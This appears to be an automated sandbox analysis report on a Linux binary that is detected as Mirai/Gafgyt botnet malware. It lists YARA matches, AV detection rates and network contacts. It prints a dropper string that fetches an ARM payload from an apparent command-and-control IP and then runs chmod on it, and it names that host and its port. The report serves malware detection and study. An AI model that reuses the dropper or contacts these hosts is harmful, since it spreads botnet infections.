Process Memory Space: xd.x86.elf PID: 6247	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Process Memory Space: xd.x86.elf PID: 6247	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x1091:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10cd:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10f5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1109:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x111d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1131:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1145:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1159:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x116d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1181:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1195:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11a9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11bd:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11d1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11e5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11f9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x120d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1221:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Process Memory Space: xd.x86.elf PID: 6247	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x1044:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
Process Memory Space: xd.x86.elf PID: 6249	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
Process Memory Space: xd.x86.elf PID: 6249	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Process Memory Space: xd.x86.elf PID: 6249	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x13f5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1409:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x141d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1431:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1445:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1459:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x146d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1481:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1495:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x14a9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x14bd:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x14d1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x14e5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x14f9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x150d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1521:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1535:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1549:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x155d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1571:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1585:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Process Memory Space: xd.x86.elf PID: 6249	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x13a8:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
Click to see the 142 entries

Joe Sandbox Signatures

• AV Detection
• Bitcoin Miner
• Networking
• System Summary
• Data Obfuscation
• Persistence and Installation Behavior
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Stealing of Sensitive Information
• Remote Access Functionality

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: xd.x86.elf	Virustotal: Detection: 44%			Perma Link
Source: xd.x86.elf	ReversingLabs: Detection: 44%

Source: /usr/bin/pulseaudio (PID: 6349)	Reads CPU info from /sys: /sys/devices/system/cpu/online			Jump to behavior
Source: /usr/bin/pkill (PID: 6376)	Reads CPU info from /sys: /sys/devices/system/cpu/online			Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.23:52458 -> 213.209.129.92:5466

Source: global traffic

HTTP traffic detected: POST /9aadafe2051348cd32033e1cad68f0a5fe46fba3240ac1e6e42158f31b8a1371790c09baf3996b4979fe8e533446c7dedf30f654c68b25357334c66911dc6a9e HTTP/1.1Host: daisy.ubuntu.comAccept: */*Content-Type: application/octet-streamX-Whoopsie-Version: 0.2.69ubuntu0.3Content-Length: 164887Expect: 100-continue

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 213.209.129.92
Source: unknown	TCP traffic detected without corresponding DNS query: 169.215.144.10
Source: unknown	TCP traffic detected without corresponding DNS query: 47.87.11.30
Source: unknown	TCP traffic detected without corresponding DNS query: 4.28.41.149
Source: unknown	TCP traffic detected without corresponding DNS query: 158.61.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 255.63.145.10
Source: unknown	TCP traffic detected without corresponding DNS query: 107.123.90.207
Source: unknown	TCP traffic detected without corresponding DNS query: 9.197.239.158
Source: unknown	TCP traffic detected without corresponding DNS query: 156.21.135.156
Source: unknown	TCP traffic detected without corresponding DNS query: 40.163.239.10
Source: unknown	TCP traffic detected without corresponding DNS query: 70.11.84.139
Source: unknown	TCP traffic detected without corresponding DNS query: 100.20.8.101
Source: unknown	TCP traffic detected without corresponding DNS query: 253.127.82.33
Source: unknown	TCP traffic detected without corresponding DNS query: 48.30.219.11
Source: unknown	TCP traffic detected without corresponding DNS query: 12.44.125.253
Source: unknown	TCP traffic detected without corresponding DNS query: 39.76.17.251
Source: unknown	TCP traffic detected without corresponding DNS query: 120.245.117.68
Source: unknown	TCP traffic detected without corresponding DNS query: 41.30.204.182
Source: unknown	TCP traffic detected without corresponding DNS query: 119.27.204.69
Source: unknown	TCP traffic detected without corresponding DNS query: 167.18.52.210
Source: unknown	TCP traffic detected without corresponding DNS query: 172.253.65.27
Source: unknown	TCP traffic detected without corresponding DNS query: 167.214.104.35
Source: unknown	TCP traffic detected without corresponding DNS query: 201.95.4.5
Source: unknown	TCP traffic detected without corresponding DNS query: 246.247.43.151
Source: unknown	TCP traffic detected without corresponding DNS query: 54.61.204.205
Source: unknown	TCP traffic detected without corresponding DNS query: 241.176.87.166
Source: unknown	TCP traffic detected without corresponding DNS query: 44.85.147.86
Source: unknown	TCP traffic detected without corresponding DNS query: 206.74.75.34
Source: unknown	TCP traffic detected without corresponding DNS query: 122.97.211.231
Source: unknown	TCP traffic detected without corresponding DNS query: 152.17.14.139
Source: unknown	TCP traffic detected without corresponding DNS query: 19.85.55.235
Source: unknown	TCP traffic detected without corresponding DNS query: 184.65.234.252
Source: unknown	TCP traffic detected without corresponding DNS query: 207.155.231.56
Source: unknown	TCP traffic detected without corresponding DNS query: 209.197.66.88
Source: unknown	TCP traffic detected without corresponding DNS query: 106.228.163.98
Source: unknown	TCP traffic detected without corresponding DNS query: 182.36.33.221
Source: unknown	TCP traffic detected without corresponding DNS query: 213.164.164.92
Source: unknown	TCP traffic detected without corresponding DNS query: 93.89.77.200
Source: unknown	TCP traffic detected without corresponding DNS query: 118.204.41.47
Source: unknown	TCP traffic detected without corresponding DNS query: 200.225.68.75
Source: unknown	TCP traffic detected without corresponding DNS query: 247.142.152.39
Source: unknown	TCP traffic detected without corresponding DNS query: 116.0.199.232
Source: unknown	TCP traffic detected without corresponding DNS query: 240.217.248.41
Source: unknown	TCP traffic detected without corresponding DNS query: 95.228.158.200
Source: unknown	TCP traffic detected without corresponding DNS query: 165.34.166.8
Source: unknown	TCP traffic detected without corresponding DNS query: 116.119.70.122
Source: unknown	TCP traffic detected without corresponding DNS query: 213.13.6.26
Source: unknown	TCP traffic detected without corresponding DNS query: 223.20.71.83
Source: unknown	TCP traffic detected without corresponding DNS query: 12.191.72.123

Source: global traffic

DNS traffic detected: DNS query: daisy.ubuntu.com

Source: unknown

Source: xd.x86.elf, 6239.1.0000000008048000.000000000805b000.r-x.sdmp, xd.x86.elf, 6241.1.0000000008048000.000000000805b000.r-x.sdmp, xd.x86.elf, 6242.1.0000000008048000.000000000805b000.r-x.sdmp, xd.x86.elf, 6243.1.0000000008048000.000000000805b000.r-x.sdmp, xd.x86.elf, 6246.1.0000000008048000.000000000805b000.r-x.sdmp, xd.x86.elf, 6247.1.0000000008048000.000000000805b000.r-x.sdmp, xd.x86.elf, 6249.1.0000000008048000.000000000805b000.r-x.sdmp	String found in binary or memory: http://213.209.129.92/d/xd.arm7;chmod
Source: xd.x86.elf	String found in binary or memory: http://upx.sf.net

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 37606 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37606
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

System Summary

Malicious sample detected (through community Yara rule)

Source: 6247.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6247.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6247.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: 6247.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6247.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_93fc3657 Author: unknown
Source: 6247.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_804f8e7c Author: unknown
Source: 6247.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_99d78950 Author: unknown
Source: 6247.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_aa39fb02 Author: unknown
Source: 6247.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_a68e498c Author: unknown
Source: 6247.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6247.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
Source: 6247.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6247.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6247.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6247.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 6249.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6249.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6249.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: 6249.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6249.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_93fc3657 Author: unknown
Source: 6249.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_804f8e7c Author: unknown
Source: 6249.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_99d78950 Author: unknown
Source: 6249.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_aa39fb02 Author: unknown
Source: 6249.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_a68e498c Author: unknown
Source: 6249.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6249.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
Source: 6249.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6249.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6249.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6249.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 6239.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6239.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6239.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: 6239.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6239.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_93fc3657 Author: unknown
Source: 6243.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6243.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6243.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: 6243.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6243.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_93fc3657 Author: unknown
Source: 6243.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_804f8e7c Author: unknown
Source: 6243.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_99d78950 Author: unknown
Source: 6243.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_aa39fb02 Author: unknown
Source: 6243.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_a68e498c Author: unknown
Source: 6243.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6243.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
Source: 6243.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6243.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6243.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6243.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 6239.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_804f8e7c Author: unknown
Source: 6239.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_99d78950 Author: unknown
Source: 6239.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_aa39fb02 Author: unknown
Source: 6239.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_a68e498c Author: unknown
Source: 6239.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6239.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
Source: 6239.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6239.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6239.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6239.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 6242.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6242.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6242.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: 6241.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6241.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6241.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: 6241.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6241.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_93fc3657 Author: unknown
Source: 6241.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_804f8e7c Author: unknown
Source: 6241.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_99d78950 Author: unknown
Source: 6241.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_aa39fb02 Author: unknown
Source: 6241.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_a68e498c Author: unknown
Source: 6241.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6241.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
Source: 6241.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6241.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6241.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6241.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 6246.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6246.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6246.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: 6246.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6246.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_93fc3657 Author: unknown
Source: 6246.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_804f8e7c Author: unknown
Source: 6246.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_99d78950 Author: unknown
Source: 6246.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_aa39fb02 Author: unknown
Source: 6246.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_a68e498c Author: unknown
Source: 6246.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6246.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
Source: 6246.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6246.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6246.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6246.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 6242.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6242.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_93fc3657 Author: unknown
Source: 6242.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_804f8e7c Author: unknown
Source: 6242.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_99d78950 Author: unknown
Source: 6242.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_aa39fb02 Author: unknown
Source: 6242.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_a68e498c Author: unknown
Source: 6242.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6242.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
Source: 6242.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6242.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6242.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6242.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: Process Memory Space: xd.x86.elf PID: 6239, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: xd.x86.elf PID: 6239, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: xd.x86.elf PID: 6241, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: xd.x86.elf PID: 6241, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: xd.x86.elf PID: 6242, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: xd.x86.elf PID: 6242, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: xd.x86.elf PID: 6243, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: xd.x86.elf PID: 6243, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: xd.x86.elf PID: 6246, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
